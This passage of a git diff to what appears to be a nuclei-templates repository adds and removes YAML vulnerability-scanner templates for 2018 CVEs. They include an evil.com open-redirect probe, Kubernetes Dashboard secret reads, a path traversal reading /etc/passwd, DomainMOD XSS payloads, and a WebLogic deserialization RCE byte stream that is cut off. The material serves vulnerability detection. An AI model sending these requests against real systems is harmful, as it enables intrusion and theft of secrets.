- name: DotCMS < 5.0.2 - Open Redirect - author: 0x_Akoko,daffainfo - severity: medium - description: | - dotCMS before 5.0.2 contains multiple open redirect vulnerabilities via the html/common/forward_js.jsp FORWARD_URL parameter or the html/portlet/ext/common/page_preview_popup.jsp hostname parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. - remediation: | - Upgrade to a version of DotCMS that is higher than 5.0.2 to mitigate the open redirect vulnerability. - reference: - - https://github.com/dotCMS/core/issues/15286 - - https://nvd.nist.gov/vuln/detail/CVE-2018-17422 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-17422 - cwe-id: CWE-601 - epss-score: 0.00118 - epss-percentile: 0.44971 - cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: dotcms - product: dotcms - shodan-query: http.title:"dotCMS" - tags: cve2018,cve,redirect,dotcms - -http: - - method: GET - path: - - '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://evil.com' - - '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=evil.com' - - stop-at-first-match: true - matchers: - - type: word - part: body - words: - - "self.location = 'http://evil.com'" - - "location.href = 'http\\x3a\\x2f\\x2fwww\\x2eevil\\x2ecom'" -# digest: 4b0a00483046022100b9ccd68c61702e8993ac90e5736b80c6f0becb6042c2e5985e4b08b0996a1e950221009c6e50a671ce1798b130f6fccf18aed8ddd2548fda94175c2bca18ff2f949a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-18264.yaml b/nuclei-templates/CVE-2018/CVE-2018-18264.yaml new file mode 100644 index 0000000000..c7c2dc378f --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-18264.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-18264 + +info: + name: Kubernetes Dashboard unauthenticated secret access + author: edoardottt + severity: high + description: Kubernetes Dashboard before 1.10.1 allows attackers to bypass authentication and use Dashboard's Service Account for reading secrets within the cluster. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-18264 + cwe-id: CWE-306 + metadata: + shodan-query: product:"Kubernetes" + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-18264 + - https://github.com/kubernetes/dashboard/pull/3289 + - https://sysdig.com/blog/privilege-escalation-kubernetes-dashboard/ + tags: cve,cve2018,kubernetes,k8s,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" + - "{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: dsl + dsl: + - 'contains(body, "apiVersion") && contains(body, "objectRef")' \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-18777.yaml b/nuclei-templates/CVE-2018/CVE-2018-18777.yaml new file mode 100644 index 0000000000..6c485e337c --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-18777.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-18777 + +info: + name: Path traversal vulnerability in Microstrategy Web version 7 + author: 0x_Akoko + severity: medium + description: | + Directory traversal vulnerability in Microstrategy Web, version 7, in "/WebMstr7/servlet/mstrWeb" (in the parameter subpage) + allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via a /.. + (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product. + reference: https://www.exploit-db.com/exploits/45755 + tags: cve,cve2018,microstrategy,lfi,traversal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2018-18777 + cwe-id: CWE-22 + +requests: + - method: GET + path: + - "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-18778.yaml b/nuclei-templates/CVE-2018/CVE-2018-18778.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-18778.yaml rename to nuclei-templates/CVE-2018/CVE-2018-18778.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19136.yaml b/nuclei-templates/CVE-2018/CVE-2018-19136.yaml new file mode 100644 index 0000000000..4d61e0aad1 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19136.yaml @@ -0,0 +1,61 @@ +id: CVE-2018-19136 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/45883/ + - https://github.com/domainmod/domainmod/issues/79 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19136 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19136 + cwe-id: CWE-79 + epss-score: 0.00152 + epss-percentile: 0.50531 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: domainmod + product: domainmod + tags: cve2018,cve,edb,domainmod,xss,authenticated + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + GET /assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&del=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">&really_del=1">YES' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a0047304502202aa2d37d93090e65caa5149dce628a5f34aaf844a03795a60118487af86ad41a022100948b4dfb7fbc394901fe1405320714bc046f960c82c84e7dd65bfd91b4001a31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-19137.yaml b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml new file mode 100644 index 0000000000..6439455c7b --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19137.yaml @@ -0,0 +1,59 @@ +id: CVE-2018-19137 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://github.com/domainmod/domainmod/issues/79 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19137 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-19137 + cwe-id: CWE-79 + epss-score: 0.00096 + epss-percentile: 0.39294 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + GET /assets/edit/ip-address.php?ipid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&del=1 HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '&really_del' + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-19365.yaml b/nuclei-templates/CVE-2018/CVE-2018-19365.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-19365.yaml rename to nuclei-templates/CVE-2018/CVE-2018-19365.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml b/nuclei-templates/CVE-2018/CVE-2018-19752.yaml deleted file mode 100644 index f5d120debe..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19752.yaml +++ /dev/null @@ -1,69 +0,0 @@ -id: CVE-2018-19752 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. - reference: - - https://github.com/domainmod/domainmod/issues/84 - - https://www.exploit-db.com/exploits/45949/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19752 - cwe-id: CWE-79 - epss-score: 0.00096 - epss-percentile: 0.39112 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/registrar.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test - - | - GET /assets/registrars.php HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a004730450220233adb77a26a1b91da079bdf0eb8b3aae6997e9e8eafc1246a94b187acbcf10e022100cc16f3f453b69215c3af952bc5f242abcd26f8e2c38445664464564ddb39f26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml b/nuclei-templates/CVE-2018/CVE-2018-19892.yaml deleted file mode 100644 index e957023784..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19892.yaml +++ /dev/null @@ -1,69 +0,0 @@ -id: CVE-2018-19892 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. - reference: - - https://www.exploit-db.com/exploits/45959 - - https://github.com/domainmod/domainmod/issues/85 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19892 - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19892 - cwe-id: CWE-79 - epss-score: 0.00101 - epss-percentile: 0.40415 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /admin/dw/add-server.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes= - - | - GET /admin/dw/servers.php HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 3 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">' - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 -# digest: 4a0a0047304502201f24e9ecdde360ff34ab0c10a92f93fbbf91649ea9a2f0154e5cfb153518dd98022100fdae8217f56ff39de6d7e9c9e41db0001fb9c8ad1b336532ad1105c5fd39fa5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml deleted file mode 100644 index 7e5a3adf5f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2018-19914 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the necessary patches to fix the XSS vulnerability. - reference: - - https://www.exploit-db.com/exploits/46375/ - - https://github.com/domainmod/domainmod/issues/87 - - https://nvd.nist.gov/vuln/detail/CVE-2018-19914 - - https://github.com/ARPSyndicate/cvemon - - https://github.com/ARPSyndicate/kenzer-templates - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-19914 - cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.50703 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve2018,cve,domainmod,xss,authenticated,edb - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/dns.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E - - | - GET /assets/dns.php HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(header_3, "text/html")' - - 'contains(body_3, ">")' - condition: and -# digest: 4a0a00473045022100ad4d510c1ce185b5e401199a825d93783a0f561aa134a108265d89f119b1d1750220431ecb234bab21342ca9f250c34c079cce22eeeffd6f278fcb778923f3661b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-19915.yaml b/nuclei-templates/CVE-2018/CVE-2018-19915.yaml new file mode 100644 index 0000000000..cb24374b98 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19915.yaml @@ -0,0 +1,61 @@ +id: CVE-2018-19915 + +info: + name: DomainMOD <=4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD (>=4.11.02) to mitigate this vulnerability. + reference: + - https://github.com/domainmod/domainmod/issues/87 + - https://www.exploit-db.com/exploits/46376/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-19915 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19915 + cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.50703 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/host.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_host=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_notes=test + - | + GET /assets/hosting.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(header_3, "text/html")' + - 'contains(body_3, ">")' + condition: and +# digest: 490a0046304402201c56275b5b7376244d1fee0f3bfde7381ade0cb088f1643b3c5e1e668e81b4490220205f8398d1ae9260a0ecd27f592441a68d4709a669d802e783370b414c610020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml deleted file mode 100644 index 9825590c16..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml +++ /dev/null @@ -1,59 +0,0 @@ -id: CVE-2018-20009 - -info: - name: DomainMOD 4.11.01 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. - remediation: | - Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. - reference: - - https://github.com/domainmod/domainmod/issues/88 - - https://www.exploit-db.com/exploits/46372/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2018-20009 - cwe-id: CWE-79 - epss-score: 0.00153 - epss-percentile: 0.51511 - cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 3 - vendor: domainmod - product: domainmod - tags: cve,cve2018,domainmod,xss,authenticated,edb - -http: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_username={{username}}&new_password={{password}} - - | - POST /assets/add/ssl-provider.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes= - - | - GET /assets/ssl-providers.php HTTP/1.1 - Host: {{Hostname}} - - host-redirects: true - max-redirects: 2 - matchers: - - type: dsl - dsl: - - 'status_code_3 == 200' - - 'contains(header_3, "text/html")' - - 'contains(body_3, ">")' - condition: and -# digest: 4a0a004730450220228d241f2ef228aa07915c9b1770c0a34473f66ec0ee918ba511d13df0a08d64022100e196267d6f49e1a417092b2d74d1123fbd4c5d366bb4ed2f01e227431da6b846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-20010.yaml b/nuclei-templates/CVE-2018/CVE-2018-20010.yaml new file mode 100644 index 0000000000..90d48ccdab --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-20010.yaml @@ -0,0 +1,60 @@ +id: CVE-2018-20010 + +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. + reference: + - https://www.exploit-db.com/exploits/46373/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20010 + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20010 + cwe-id: CWE-79 + epss-score: 0.00153 + epss-percentile: 0.50703 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: domainmod + product: domainmod + tags: cve,cve2018,domainmod,xss,authenticated,edb + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/ssl-provider-account.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_ssl_provider_id=1&new_owner_id=1&new_email_address=&new_username=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_password=&new_reseller=0&new_reseller_id=&new_notes= + - | + GET /assets/ssl-accounts.php HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(header_3, "text/html")' + - 'contains(body_3, ">")' + condition: and +# digest: 4b0a00483046022100c634c1d3655ae86d99caaad29c7f5a5d4ef4d696601e6b952bb796b1326800c7022100f409497a17e56982fb3e63e4424b98b22222eeb4b224a7647417f3220245c8cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-2392.yaml b/nuclei-templates/CVE-2018/CVE-2018-2392.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-2392.yaml rename to nuclei-templates/CVE-2018/CVE-2018-2392.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-2628.yaml b/nuclei-templates/CVE-2018/CVE-2018-2628.yaml deleted file mode 100644 index 6ea92ada0e..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-2628.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2018-2628 - -info: - name: Oracle WebLogic Server Deserialization RCE - author: milo2012 - severity: critical - description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. - reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-2628 - cwe-id: CWE-502 - tags: cve,cve2018,oracle,weblogic,network,deserialization - -network: - - inputs: - - data: "{{hex_decode('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a')}}" - read: 1024 - - data: "{{hex_decode('000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3234322e3231342e312e32353461863d1d0000000078')}}" - read: 1024 - - data: "{{hex_decode('000003ad056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707729000a556e69636173745265660000000005a2000000005649e3fd00000000000000000000000000000078fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c